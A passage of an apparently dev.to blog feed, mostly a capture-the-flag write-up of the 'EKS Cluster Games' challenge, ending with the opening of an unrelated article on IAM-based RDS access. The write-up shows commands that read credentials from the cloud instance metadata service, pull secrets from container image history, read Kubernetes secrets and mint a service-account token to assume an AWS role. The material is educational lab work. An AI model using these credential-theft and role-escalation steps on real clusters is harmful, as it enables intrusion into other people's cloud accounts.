sha256:62a84aabdaff849b4d1e976aa70ed4d4f5a8e6bed29c7a8fa25603803b72048d root@wiz-eks-challenge:~# <span class="nb">tar </span>xvzf 71e23506d26b19d0d86d7ca64f9214c31a4ad9ccbff325b45be74ab2a6279e22.tar.gz etc/ flag.txt proc/ sys/ root@wiz-eks-challenge:~# <span class="nb">cat </span>flag.txt wiz_eks_challenge<span class="o">{</span>always_look_for_imagepullsecrets<span class="o">}</span> </code></pre> </div> <p>And here is the flag! Let's paste it to the task page and... Turns out this is the wrong flag! But how? Did I miss something?</p> <p>Let's take a look at the image once more:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>root@wiz-eks-challenge:~# crane config eksclustergames/base_ext_image:latest | jq <span class="o">{</span> <span class="o">{</span>...<span class="o">}</span> <span class="s2">"history"</span>: <span class="o">[</span> <span class="o">{</span>...<span class="o">}</span>, <span class="o">{</span> <span class="s2">"created"</span>: <span class="s2">"2025-08-13T14:12:01.893680673+03:00"</span>, <span class="s2">"created_by"</span>: <span class="s2">"RUN sh -c echo 'wiz_eks_challenge{nothing_can_be_said_to_be_certain_except_death_taxes_and_the_exisitense_of_misconfigured_imagepullsecret}' &gt; /flag.txt # buildkit"</span>, <span class="s2">"comment"</span>: <span class="s2">"buildkit.dockerfile.v0"</span> <span class="o">}</span>, <span class="o">{</span>...<span class="o">}</span> <span class="o">]</span>, <span class="o">{</span>...<span class="o">}</span> <span class="o">}</span> </code></pre> </div> <p>Oh, you! So THIS is the actual flag! I could never.</p> <h2> Image Inquisition </h2> <blockquote> <p>Task:<br> A pod's image holds more than just code. Dive deep into its ECR repository, inspect the image layers, and uncover the hidden secret.</p> <p>Remember: You are running inside a compromised EKS pod.</p> </blockquote> <p>Kubernetes policy:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight json"><code><span class="p">{</span><span class="w"> </span><span class="nl">"pods"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w"> </span><span class="s2">"list"</span><span class="p">,</span><span class="w"> </span><span class="s2">"get"</span><span class="w"> </span><span class="p">]</span><span class="w"> </span><span class="p">}</span><span class="w"> </span></code></pre> </div> <p>All right. Let's start with a quick R&amp;R.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>root@wiz-eks-challenge:~# k get pods NAME READY STATUS RESTARTS AGE accounting-pod-acbd5209 1/1 Running 0 23d root@wiz-eks-challenge:~# k get pod accounting-pod-acbd5209 <span class="nt">-o</span> yaml apiVersion: v1 kind: Pod metadata: annotations: pulumi.com/autonamed: <span class="s2">"true"</span> creationTimestamp: <span class="s2">"2025-08-13T11:22:21Z"</span> generation: 1 name: accounting-pod-acbd5209 namespace: challenge3 resourceVersion: <span class="s2">"280912506"</span> uid: ff755d4c-5581-4673-8e2f-5bd999882d5d spec: containers: - image: 688655246681.dkr.ecr.us-west-1.amazonaws.com/central_repo-579b0b7@sha256:78ed636b41e5158cc9cb3542fbd578ad7705ce4194048b2ec8783dd0299ef3c4 <span class="o">{</span>...<span class="o">}</span> root@wiz-eks-challenge:~# crane config 46681.dkr.ecr.us-west-1.amazonaws.com/central_repo-579b0b7@sha256:78ed636b41e5158cc9cb3542fbd578ad7705ce4194048b2ec8783dd0299ef3c4 Error: fetching config: reading image <span class="s2">"46681.dkr.ecr.us-west-1.amazonaws.com/central_repo-579b0b7@sha256:78ed636b41e5158cc9cb3542fbd578ad7705ce4194048b2ec8783dd0299ef3c4"</span>: GET https://46681.dkr.ecr.us-west-1.amazonaws.com/v2/central_repo-579b0b7/manifests/sha256:78ed636b41e5158cc9cb3542fbd578ad7705ce4194048b2ec8783dd0299ef3c4: unexpected status code 401 Unauthorized: Not Authorized root@wiz-eks-challenge:~# k <span class="nb">exec</span> <span class="nt">-ti</span> accounting-pod-acbd5209 <span class="nt">--</span> /bin/bash Error from server <span class="o">(</span>Forbidden<span class="o">)</span>: pods <span class="s2">"accounting-pod-acbd5209"</span> is forbidden: User <span class="s2">"system:serviceaccount:challenge3:service-account-challenge3"</span> cannot create resource <span class="s2">"pods/exec"</span> <span class="k">in </span>API group <span class="s2">""</span> <span class="k">in </span>the namespace <span class="s2">"challenge3"</span> root@wiz-eks-challenge:~# aws sts get-caller-identity Unable to locate credentials. You can configure credentials by running <span class="s2">"aws configure"</span><span class="nb">.</span> root@wiz-eks-challenge:~# <span class="nb">ls</span> <span class="nt">-la</span> ~/.aws <span class="nb">ls</span>: cannot access <span class="s1">'/home/user/.aws'</span>: No such file or directory root@wiz-eks-challenge:~# aws ecr list-images <span class="nt">--repository-name</span> entral_repo-579b0b7 Unable to locate credentials. You can configure credentials by running <span class="s2">"aws configure"</span><span class="nb">.</span> root@wiz-eks-challenge:~# crane <span class="nb">export </span>688655246681.dkr.ecr.us-west-1.amazonaws.com/central_repo-579b0b7@sha256:78ed636b41e5158cc9cb3542fbd578ad7705ce4194048b2ec8783dd0299ef3c4 - Error: pulling 688655246681.dkr.ecr.us-west-1.amazonaws.com/central_repo-579b0b7@sha256:78ed636b41e5158cc9cb3542fbd578ad7705ce4194048b2ec8783dd0299ef3c4: GET https://688655246681.dkr.ecr.us-west-1.amazonaws.com/v2/central_repo-579b0b7/manifests/sha256:78ed636b41e5158cc9cb3542fbd578ad7705ce4194048b2ec8783dd0299ef3c4: unexpected status code 401 Unauthorized: Not Authorized </code></pre> </div> <p>As we see, all the fun stuff is unavailable (expected, but still). Nothing interesting about the pod, no leftover credentials, and no access to the registry either.<br> Let's dive further. Specifically, let's explore the instance metadata -- perhaps we can find something of interest there.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>root@wiz-eks-challenge:~# curl 169.254.169.254/latest/meta-data/iam/ info security-credentials/ root@wiz-eks-challenge:~# curl 169.254.169.254/latest/meta-data/iam/security-credentials/ eks-challenge-cluster-nodegroup-NodeInstanceRole root@wiz-eks-challenge:~# curl 169.254.169.254/latest/meta-data/iam/security-credentials/eks-challenge-cluster-nodegroup-NodeInstanceRole <span class="o">{</span><span class="s2">"AccessKeyId"</span>:<span class="s2">"ASIA2AVYNEVMQUHHPZJM"</span>,<span class="s2">"Expiration"</span>:<span class="s2">"2025-09-05 21:20:11+00:00"</span>,<span class="s2">"SecretAccessKey"</span>:<span class="s2">"/ktJO622Y5GSAXmqdgv+ySje4QNGRgE+..."</span>,<span class="s2">"SessionToken"</span>:<span class="s2">"FwoGZXIvYXdzECYaDGJ/..."</span><span class="o">}</span> </code></pre> </div> <p>Nice! We have session credentials which we can use to authorize the <code>awscli</code>.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>root@wiz-eks-challenge:~# <span class="nb">mkdir</span> <span class="nt">-p</span> ~/.aws <span class="o">&amp;&amp;</span> <span class="nb">cat</span> <span class="o">&lt;&lt;</span> <span class="no">EOF</span><span class="sh"> &gt; ~/.aws/credentials &gt; [default] &gt; aws_access_key = ASIA2AVYNEVMQUHHPZJM &gt; aws_secret_access_key = /ktJO622Y5GSAXmqdgv+ySje4QNGRgE+... &gt; session_token = FwoGZXIvYXdzECYaDGJ/... &gt; EOF root@wiz-eks-challenge:~# aws ecr describe-registry An error occurred (AccessDeniedException) when calling the DescribeRegistry operation: User: arn:aws:sts::688655246681:assumed-role/eks-challenge-cluster-nodegroup-NodeInstanceRole/i-0bd90a7fe60cdb9f7 is not authorized to perform: ecr:DescribeRegistry on resource: * because no identity-based policy allows the ecr:DescribeRegistry action </span></code></pre> </div> <p>It seems that our role is limited, after all. But that's okay; in the end we mainly want to focus on the images in the registry, not the registry itself.</p> <p>Let's use a neat command to get ECR login credentials.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>root@wiz-eks-challenge:~# aws ecr get-login-password eyJwYXlsb2FkIjoicjlEOCt4Vnd6N01QWEx5bjN5dWdXTmpoQkFEZnNQZndjU25FQmd6WmRzRUg3T3ZsdURhc[...] <span class="c"># omitted for brevity</span> root@wiz-eks-challenge:~# <span class="nb">echo</span> <span class="nt">-n</span> <span class="s1">'[base64-encoded-data]'</span> | <span class="nb">base64</span> <span class="nt">-d</span> <span class="o">{</span><span class="s2">"payload"</span>:<span class="s2">"r9D8+xVwz7MPXLyn3yugWNjhBADfsPfwcSnEBgzZdsEH7OvluDarr29d85Hr..."</span>,<span class="s2">"datakey"</span>:<span class="s2">"AQEBAHijEFXGwF1cipVOacG8qRmJoVBPay8LUUvU8RCVV0XoHwAAAH4wfAYJKoZIh..."</span>,<span class="s2">"version"</span>:<span class="s2">"2"</span>,<span class="s2">"type"</span>:<span class="s2">"DATA_KEY"</span>,<span class="s2">"expiration"</span>:1757147299<span class="o">}</span> </code></pre> </div> <p>Great! Several decoding attempts later it was clear to me that this is binary authorization data and I just have to pass it to a login command and not try to decode it all.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>root@wiz-eks-challenge:~# aws ecr get-login-password <span class="nt">--region</span> us-west-1 | crane auth login <span class="nt">--username</span> AWS <span class="nt">--password-stdin</span> 688655246681.dkr.ecr.us-west-1.amazonaws.com 2025/09/05 20:30:48 logged <span class="k">in </span>via /home/user/.docker/config.json </code></pre> </div> <p>Now let's finally dissect the image that we're given.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>root@wiz-eks-challenge:~# kubectl get pods accounting-pod-acbd5209 <span class="nt">-o</span> yaml | <span class="nb">grep</span> <span class="s1">'\- image:'</span> - image: 688655246681.dkr.ecr.us-west-1.amazonaws.com/central_repo-579b0b7@sha256:78ed636b41e5158cc9cb3542fbd578ad7705ce4194048b2ec8783dd0299ef3c4 root@wiz-eks-challenge:~# crane config 688655246681.dkr.ecr.us-west-1.amazonaws.com/central_repo-579b0b7@sha256:78ed636b41e5158cc9cb3542fbd578ad7705ce4194048b2ec8783dd0299ef3c4 | jq <span class="o">{</span> <span class="o">{</span>...<span class="o">}</span> <span class="o">{</span> <span class="s2">"created"</span>: <span class="s2">"2025-08-13T11:22:17.044629915Z"</span>, <span class="s2">"created_by"</span>: <span class="s2">"RUN sh -c #ARTIFACTORY_USERNAME=challenge@eksclustergames.com ARTIFACTORY_TOKEN=wiz_eks_challenge{the_history_of_container_images_could_reveal_the_secrets_to_the_future} ARTIFACTORY_REPO=base_repo /bin/sh -c pip install setuptools --index-url intrepo.eksclustergames.com # buildkit # buildkit"</span>, <span class="s2">"comment"</span>: <span class="s2">"buildkit.dockerfile.v0"</span> <span class="o">}</span>, <span class="o">{</span>...<span class="o">}</span> <span class="o">}</span> </code></pre> </div> <p>Et voilà! And there we have it -- the secret we were looking for, nicely hidden in a Docker image layer.</p> <h2> Pod Break </h2> <blockquote> <p>Task:<br> You're inside a vulnerable pod on an EKS cluster. Your pod's service-account has no permissions. Can you navigate your way to access the EKS Node's privileged service-account?</p> </blockquote> <p>Kubernetes policy:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight json"><code><span class="p">{}</span><span class="w"> </span></code></pre> </div> <p>Oh, this is a fun one. We have no permissions on a Kubernetes cluster whatsoever and we have to access a service account.</p> <p>We can start with the same approach as in a previous task: obtain credentials from the instance metadata.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>root@wiz-eks-challenge:~# curl 169.254.169.254/latest/meta-data/iam/security-credentials/ eks-challenge-cluster-nodegroup-NodeInstanceRole root@wiz-eks-challenge:~# curl 169.254.169.254/latest/meta-data/iam/security-credentials/eks-challenge-cluster-nodegroup-NodeInstanceRole 2&gt;/dev/null | jq <span class="o">{</span> <span class="s2">"AccessKeyId"</span>: <span class="s2">"ASIA2AVYNEVM2STWPOMB"</span>, <span class="s2">"Expiration"</span>: <span class="s2">"2025-09-05 21:33:34+00:00"</span>, <span class="s2">"SecretAccessKey"</span>: <span class="s2">"BY4ToDWNJniAbLyYzou..."</span>, <span class="s2">"SessionToken"</span>: <span class="s2">"FwoGZXIvYXdzECYaDNjSr8orzSsKmTYNbCK3AV9V7Vum3ITD7/..."</span> <span class="o">}</span> root@wiz-eks-challenge:~# <span class="nb">mkdir</span> <span class="nt">-p</span> ~/.aws <span class="o">&amp;&amp;</span> <span class="nb">cat</span> <span class="o">&lt;&lt;</span> <span class="no">EOF</span><span class="sh"> &gt; ~/.aws/credentials &gt; [default] &gt; aws_access_key_id = ASIA2AVYNEVM2STWPOMB &gt; aws_secret_access_key = BY4ToDWNJniAbLyYzou... &gt; aws_session_token = FwoGZXIvYXdzECYaDNjSr8orzSsKmTYNbCK3AV9V7Vum3ITD7/... &gt; EOF root@wiz-eks-challenge:~# aws sts get-caller-identity { "UserId": "AROA2AVYNEVMQ3Z5GHZHS:i-0bd90a7fe60cdb9f7", "Account": "688655246681", "Arn": "arn:aws:sts::688655246681:assumed-role/eks-challenge-cluster-nodegroup-NodeInstanceRole/i-0bd90a7fe60cdb9f7" } </span></code></pre> </div> <p>Great! The credentials are obtained. Now, for the next step. With the help of the retrieved IAM role we can try to get an EKS authorization token.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>root@wiz-eks-challenge:~# aws eks get-token <span class="nt">--cluster-name</span> eks-challenge-cluster <span class="o">{</span> <span class="s2">"kind"</span>: <span class="s2">"ExecCredential"</span>, <span class="s2">"apiVersion"</span>: <span class="s2">"client.authentication.k8s.io/v1beta1"</span>, <span class="s2">"spec"</span>: <span class="o">{}</span>, <span class="s2">"status"</span>: <span class="o">{</span> <span class="s2">"expirationTimestamp"</span>: <span class="s2">"2025-09-05T20:57:45Z"</span>, <span class="s2">"token"</span>: <span class="s2">"k8s-aws-v1.aHR0cHM6Ly9zdHMudXMtd2VzdC0xLmFt..."</span> <span class="o">}</span> <span class="o">}</span> </code></pre> </div> <p>All right, the token is here. Let's see what we have available.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>root@wiz-eks-challenge:~# <span class="nv">TOKEN</span><span class="o">=</span><span class="si">$(</span>aws eks get-token <span class="nt">--cluster-name</span><span class="o">=</span>eks-challenge-cluster | jq <span class="s1">'.status.token'</span> | <span class="nb">sed</span> <span class="s2">"s/</span><span class="se">\"</span><span class="s2">//g"</span><span class="si">)</span> root@wiz-eks-challenge:~# kubectl <span class="nt">--token</span><span class="o">=</span><span class="nv">$TOKEN</span> get pods No resources found <span class="k">in </span>challenge4 namespace. root@wiz-eks-challenge:~# kubectl <span class="nt">--token</span><span class="o">=</span><span class="nv">$TOKEN</span> get all Error from server <span class="o">(</span>Forbidden<span class="o">)</span>: replicationcontrollers is forbidden: User <span class="s2">"system:node:challenge:ip-192-168-63-122.us-west-1.compute.internal"</span> cannot list resource <span class="s2">"replicationcontrollers"</span> <span class="k">in </span>API group <span class="s2">""</span> <span class="k">in </span>the namespace <span class="s2">"challenge4"</span> Error from server <span class="o">(</span>Forbidden<span class="o">)</span>: services is forbidden: User <span class="s2">"system:node:challenge:ip-192-168-63-122.us-west-1.compute.internal"</span> cannot list resource <span class="s2">"services"</span> <span class="k">in </span>API group <span class="s2">""</span> <span class="k">in </span>the namespace <span class="s2">"challenge4"</span> Error from server <span class="o">(</span>Forbidden<span class="o">)</span>: daemonsets.apps is forbidden: User <span class="s2">"system:node:challenge:ip-192-168-63-122.us-west-1.compute.internal"</span> cannot list resource <span class="s2">"daemonsets"</span> <span class="k">in </span>API group <span class="s2">"apps"</span> <span class="k">in </span>the namespace <span class="s2">"challenge4"</span> Error from server <span class="o">(</span>Forbidden<span class="o">)</span>: deployments.apps is forbidden: User <span class="s2">"system:node:challenge:ip-192-168-63-122.us-west-1.compute.internal"</span> cannot list resource <span class="s2">"deployments"</span> <span class="k">in </span>API group <span class="s2">"apps"</span> <span class="k">in </span>the namespace <span class="s2">"challenge4"</span> Error from server <span class="o">(</span>Forbidden<span class="o">)</span>: replicasets.apps is forbidden: User <span class="s2">"system:node:challenge:ip-192-168-63-122.us-west-1.compute.internal"</span> cannot list resource <span class="s2">"replicasets"</span> <span class="k">in </span>API group <span class="s2">"apps"</span> <span class="k">in </span>the namespace <span class="s2">"challenge4"</span> Error from server <span class="o">(</span>Forbidden<span class="o">)</span>: statefulsets.apps is forbidden: User <span class="s2">"system:node:challenge:ip-192-168-63-122.us-west-1.compute.internal"</span> cannot list resource <span class="s2">"statefulsets"</span> <span class="k">in </span>API group <span class="s2">"apps"</span> <span class="k">in </span>the namespace <span class="s2">"challenge4"</span> Error from server <span class="o">(</span>Forbidden<span class="o">)</span>: horizontalpodautoscalers.autoscaling is forbidden: User <span class="s2">"system:node:challenge:ip-192-168-63-122.us-west-1.compute.internal"</span> cannot list resource <span class="s2">"horizontalpodautoscalers"</span> <span class="k">in </span>API group <span class="s2">"autoscaling"</span> <span class="k">in </span>the namespace <span class="s2">"challenge4"</span> Error from server <span class="o">(</span>Forbidden<span class="o">)</span>: cronjobs.batch is forbidden: User <span class="s2">"system:node:challenge:ip-192-168-63-122.us-west-1.compute.internal"</span> cannot list resource <span class="s2">"cronjobs"</span> <span class="k">in </span>API group <span class="s2">"batch"</span> <span class="k">in </span>the namespace <span class="s2">"challenge4"</span> Error from server <span class="o">(</span>Forbidden<span class="o">)</span>: jobs.batch is forbidden: User <span class="s2">"system:node:challenge:ip-192-168-63-122.us-west-1.compute.internal"</span> cannot list resource <span class="s2">"jobs"</span> <span class="k">in </span>API group <span class="s2">"batch"</span> <span class="k">in </span>the namespace <span class="s2">"challenge4"</span> </code></pre> </div> <p>Not much is available. Oh well, let's try to access the basic secret stuff.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>root@wiz-eks-challenge:~# kubectl <span class="nt">--token</span><span class="o">=</span><span class="nv">$TOKEN</span> get secret NAME TYPE DATA AGE node-flag Opaque 1 674d root@wiz-eks-challenge:~# kubectl <span class="nt">--token</span><span class="o">=</span><span class="nv">$TOKEN</span> get secret node-flag <span class="nt">-o</span> json | jq <span class="nt">-r</span> <span class="s1">'.data.flag'</span> | <span class="nb">base64</span> <span class="nt">-d</span> wiz_eks_challenge<span class="o">{</span>only_a_real_pro_can_navigate_IMDS_to_EKS_congrats<span class="o">}</span> </code></pre> </div> <p>Hey, it says we're real pros! That's so nice of them.</p> <h2> Container Secrets Infrastructure </h2> <blockquote> <p>Task:<br> You've successfully transitioned from a limited Service Account to a Node Service Account! Great job. Your next challenge is to move from the EKS to the AWS account. Can you acquire the AWS role of the s3access-sa service account, and get the flag?</p> </blockquote> <p>IAM role policy:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight json"><code><span class="p">{</span><span class="w"> </span><span class="nl">"Policy"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"Statement"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"Action"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w"> </span><span class="s2">"s3:GetObject"</span><span class="p">,</span><span class="w"> </span><span class="s2">"s3:ListBucket"</span><span class="w"> </span><span class="p">],</span><span class="w"> </span><span class="nl">"Effect"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Allow"</span><span class="p">,</span><span class="w"> </span><span class="nl">"Resource"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w"> </span><span class="s2">"arn:aws:s3:::challenge-flag-bucket-3ff1ae2"</span><span class="p">,</span><span class="w"> </span><span class="s2">"arn:aws:s3:::challenge-flag-bucket-3ff1ae2/flag"</span><span class="w"> </span><span class="p">]</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">],</span><span class="w"> </span><span class="nl">"Version"</span><span class="p">:</span><span class="w"> </span><span class="s2">"2012-10-17"</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">}</span><span class="w"> </span></code></pre> </div> <p>IAM trust policy:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight json"><code><span class="p">{</span><span class="w"> </span><span class="nl">"Version"</span><span class="p">:</span><span class="w"> </span><span class="s2">"2012-10-17"</span><span class="p">,</span><span class="w"> </span><span class="nl">"Statement"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"Effect"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Allow"</span><span class="p">,</span><span class="w"> </span><span class="nl">"Principal"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"Federated"</span><span class="p">:</span><span class="w"> </span><span class="s2">"arn:aws:iam::688655246681:oidc-provider/oidc.eks.us-west-1.amazonaws.com/id/C062C207C8F50DE4EC24A372FF60E589"</span><span class="w"> </span><span class="p">},</span><span class="w"> </span><span class="nl">"Action"</span><span class="p">:</span><span class="w"> </span><span class="s2">"sts:AssumeRoleWithWebIdentity"</span><span class="p">,</span><span class="w"> </span><span class="nl">"Condition"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"StringEquals"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"oidc.eks.us-west-1.amazonaws.com/id/C062C207C8F50DE4EC24A372FF60E589:aud"</span><span class="p">:</span><span class="w"> </span><span class="s2">"sts.amazonaws.com"</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">]</span><span class="w"> </span><span class="p">}</span><span class="w"> </span></code></pre> </div> <p>Kubernetes policy:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight json"><code><span class="p">{</span><span class="w"> </span><span class="nl">"secrets"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w"> </span><span class="s2">"get"</span><span class="p">,</span><span class="w"> </span><span class="s2">"list"</span><span class="w"> </span><span class="p">],</span><span class="w"> </span><span class="nl">"serviceaccounts"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w"> </span><span class="s2">"get"</span><span class="p">,</span><span class="w"> </span><span class="s2">"list"</span><span class="w"> </span><span class="p">],</span><span class="w"> </span><span class="nl">"pods"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w"> </span><span class="s2">"get"</span><span class="p">,</span><span class="w"> </span><span class="s2">"list"</span><span class="w"> </span><span class="p">],</span><span class="w"> </span><span class="nl">"serviceaccounts/token"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w"> </span><span class="s2">"create"</span><span class="w"> </span><span class="p">]</span><span class="w"> </span><span class="p">}</span><span class="w"> </span></code></pre> </div> <p>This task looks like an amalgam of all the previous tasks in this challenge. The policies, apart from giving us access to the desired flag, hint at what we actually can do with our permissions. For example, the audience in the trust policy is there for a reason. And we're given the ability to create a ServiceAccount token for a reason. (Unless, of course, this is exactly to throw us off the path -- but we will see that soon enough.)</p> <p>Let's start with credentials.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>root@wiz-eks-challenge:~# aws sts get-caller-identity <span class="o">{</span> <span class="s2">"UserId"</span>: <span class="s2">"AROA2AVYNEVMQ3Z5GHZHS:i-0bd90a7fe60cdb9f7"</span>, <span class="s2">"Account"</span>: <span class="s2">"688655246681"</span>, <span class="s2">"Arn"</span>: <span class="s2">"arn:aws:sts::688655246681:assumed-role/eks-challenge-cluster-nodegroup-NodeInstanceRole/i-0bd90a7fe60cdb9f7"</span> <span class="o">}</span> </code></pre> </div> <p>We have an assumed role for the instance, but it's of no interest to us. Let's try to find another role to assume.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>root@wiz-eks-challenge:~# kubectl describe sa Name: debug-sa Namespace: challenge5 Labels: &lt;none&gt; Annotations: description: This is a dummy service account with empty policy attached eks.amazonaws.com/role-arn: arn:aws:iam::688655246681:role/challengeTestRole-fc9d18e ... Name: default Namespace: challenge5 ... Name: s3access-sa Namespace: challenge5 Labels: &lt;none&gt; Annotations: eks.amazonaws.com/role-arn: arn:aws:iam::688655246681:role/challengeEksS3Role ... </code></pre> </div> <p>As we can see, we have three ServiceAccounts available to us. Two of them have roles we can assume. And only one, it seems, is the role with actual permissions to access the flag.</p> <p>For the next trick we would want to have a web identity token (JWT), which will allow us to assume the next-level role. Let's try to obtain one.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>root@wiz-eks-challenge:~# kubectl create token s3access-sa <span class="nt">--audience</span><span class="o">=</span>sts.amazonaws.com error: failed to create token: serviceaccounts <span class="s2">"s3access-sa"</span> is forbidden: User <span class="s2">"system:node:challenge:ip-192-168-63-122.us-west-1.compute.internal"</span> cannot create resource <span class="s2">"serviceaccounts/token"</span> <span class="k">in </span>API group <span class="s2">""</span> <span class="k">in </span>the namespace <span class="s2">"challenge5"</span> </code></pre> </div> <p>Bummer. But what about another ServiceAccount?<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>root@wiz-eks-challenge:~# kubectl create token debug-sa <span class="nt">--audience</span><span class="o">=</span>sts.amazonaws.com eyJhbGciOiJSUzI1NiIsImtpZCI6ImRmZjE4OGZjZDg3... </code></pre> </div> <p>Bingo!<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>root@wiz-eks-challenge:~# aws sts assume-role-with-web-identity <span class="se">\</span> <span class="nt">--role-arn</span> arn:aws:iam::688655246681:role/challengeEksS3Role <span class="se">\</span> <span class="nt">--role-session-name</span> HeresJohnny <span class="nt">--web-identity-token</span> eyJhbGciOiJSUzI1NiIsImtpZCI6ImRmZjE4OGZjZDg3.... <span class="se">\</span> <span class="o">{</span> <span class="s2">"Credentials"</span>: <span class="o">{</span> <span class="s2">"AccessKeyId"</span>: <span class="s2">"ASIA2AVYNEVMYGOPTRII"</span>, <span class="s2">"SecretAccessKey"</span>: <span class="s2">"87W2QkL9e1Mkdj4T0Zf/..."</span>, <span class="s2">"SessionToken"</span>: <span class="s2">"IQoJb3JpZ2luX2VjEGQaCXVzLXdlc3QtMSJHMEUCIQCfVepHS05hYgXgg8Eu9YwNC44WuH2..."</span>, <span class="s2">"Expiration"</span>: <span class="s2">"2025-09-30T12:38:48+00:00"</span> <span class="o">}</span>, <span class="s2">"SubjectFromWebIdentityToken"</span>: <span class="s2">"system:serviceaccount:challenge5:debug-sa"</span>, <span class="s2">"AssumedRoleUser"</span>: <span class="o">{</span> <span class="s2">"AssumedRoleId"</span>: <span class="s2">"AROA2AVYNEVMZEZ2AFVYI:HeresJohnny"</span>, <span class="s2">"Arn"</span>: <span class="s2">"arn:aws:sts::688655246681:assumed-role/challengeEksS3Role/HeresJohnny"</span> <span class="o">}</span>, <span class="s2">"Provider"</span>: <span class="s2">"arn:aws:iam::688655246681:oidc-provider/oidc.eks.us-west-1.amazonaws.com/id/C062C207C8F50DE4EC24A372FF60E589"</span>, <span class="s2">"Audience"</span>: <span class="s2">"sts.amazonaws.com"</span> <span class="o">}</span> </code></pre> </div> <p>Almost there! Now, the final stretch:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>root@wiz-eks-challenge:~# <span class="nb">export </span><span class="nv">AWS_ACCESS_KEY_ID</span><span class="o">=</span>ASIA2AVYNEVMQEKAGCGB root@wiz-eks-challenge:~# <span class="nb">export </span><span class="nv">AWS_SECRET_ACCESS_KEY</span><span class="o">=</span>87W2QkL9e1Mkdj4T0Zf/... root@wiz-eks-challenge:~# <span class="nb">export </span><span class="nv">AWS_SESSION_TOKEN</span><span class="o">=</span>IQoJb3JpZ2luX2VjEGQaCXVzLXdlc3QtMSJHMEUCIQCfVepHS05hYgXgg8Eu9YwNC44WuH2... root@wiz-eks-challenge:~# aws sts get-caller-identity <span class="o">{</span> <span class="s2">"UserId"</span>: <span class="s2">"AROA2AVYNEVMZEZ2AFVYI:imcoming"</span>, <span class="s2">"Account"</span>: <span class="s2">"688655246681"</span>, <span class="s2">"Arn"</span>: <span class="s2">"arn:aws:sts::688655246681:assumed-role/challengeEksS3Role/imcoming"</span> <span class="o">}</span> root@wiz-eks-challenge:~# aws s3 <span class="nb">cp </span>s3://challenge-flag-bucket-3ff1ae2/flag - | <span class="nb">cat </span>wiz_eks_challenge<span class="o">{</span>w0w_y0u_really_are_4n_eks_and_aws_exp1oitation_legend<span class="o">}</span> </code></pre> </div> <p>And there we have it! We really are EKS and AWS exploitation legends!</p> <h2> Afterword </h2> <p>Yet another complicated and super-fun challenge. I was as frustrated by not understanding where to go as I was enjoying finding the breadcrumbs along the way that pointed to the next step. Even though the challenge is already two years old (at the time of writing), the lessons from the tasks are still very relevant today. It's never too late to learn something new about information systems security, and it's never a bad idea to remember common mistakes. Because as simple an attack as <a href="https://owasp.org/Top10/A03_2021-Injection/" rel="noopener noreferrer">SQL Injection</a> is still in the <a href="https://owasp.org/www-project-top-ten/" rel="noopener noreferrer">OWASP Top 10</a> Web Application Security Risks to this day.</p> <p>Stay secure!</p> <p><a href="mailto:reply@hatedabamboo.me?subject=Reply%20to%3A%20EKS%20Cluster%20Games">Reply to this post ✉️</a></p> aws ctf kubernetes eks Kubernetes to RDS: secure connections via IAM roles without passwords Kirill Sun, 31 Aug 2025 10:39:38 +0000 https://dev.to/aws-builders/kubernetes-to-rds-secure-connections-via-iam-roles-without-passwords-44hd https://dev.to/aws-builders/kubernetes-to-rds-secure-connections-via-iam-roles-without-passwords-44hd <p>Databases are a cornerstone of any meaningful business application. Or not meaningful. Or not even business. They keep things consistent. Yes, that’s the one.</p> <p>For decades, we’ve been using usernames and passwords to connect to databases inside applications. While consistent and secure enough, sometimes we want a different, more secure way to access sensitive data. And in this article, I’m going to show you the entire process of configuring a database connection using AWS native tools -- IAM roles and policies.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fqs54e46j2goxk9wstgmt.webp" 